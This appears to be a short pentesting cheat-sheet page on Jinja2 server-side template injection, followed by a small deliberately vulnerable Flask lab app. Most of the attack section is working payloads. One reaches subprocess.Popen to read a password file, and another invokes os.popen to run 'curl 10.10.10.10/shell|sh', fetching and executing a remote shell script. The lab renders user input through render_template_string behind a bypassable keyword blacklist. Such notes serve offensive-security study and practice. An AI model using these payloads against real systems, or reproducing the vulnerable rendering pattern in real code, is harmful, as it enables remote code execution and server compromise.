SSTI

Todo

{{''.__class__.__mro__[1].__subclasses__()}}

We need to find `subprocess.Popen`

{{''.__class__.__mro__[1].__subclasses__()[250:]}}
{{''.__class__.__mro__[1].__subclasses__()[408]("cat+.passwd",shell=True,stdout=-1).communicate()[0].strip()}}

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl+10.10.10.10/shell|sh')}}
{{ self._TemplateReference__context.joiner.__init__.__globals__.os }}
{{ self._TemplateReference__context.namespace.__init__.__globals__.os }}

Basic Lab

from flask import Flask, request, render_template_string

app = Flask(__name__)

blacklist = ['.', '}}', '*', '[', ']', "'", '{{', '_', '+', '/', '-', '<', '>', 'self', 'globals', 'builtins', 'import', 'init', 'class', 'mro', 'getitem', 'config', 'base', 'safe']

@app.route('/')
def index():
    param = request.args.get('cmd', '')
    error = None

    if any(blacklisted_word in param for blacklisted_word in blacklist):
        error = "L'utilisation de certains mots n'est pas autorisée."
        return render_template_string("Error")
    return render_template_string(param, error=error)

if __name__ == '__main__':
    app.run(debug=True)

References

PreviousShellsNextXSS

Last updated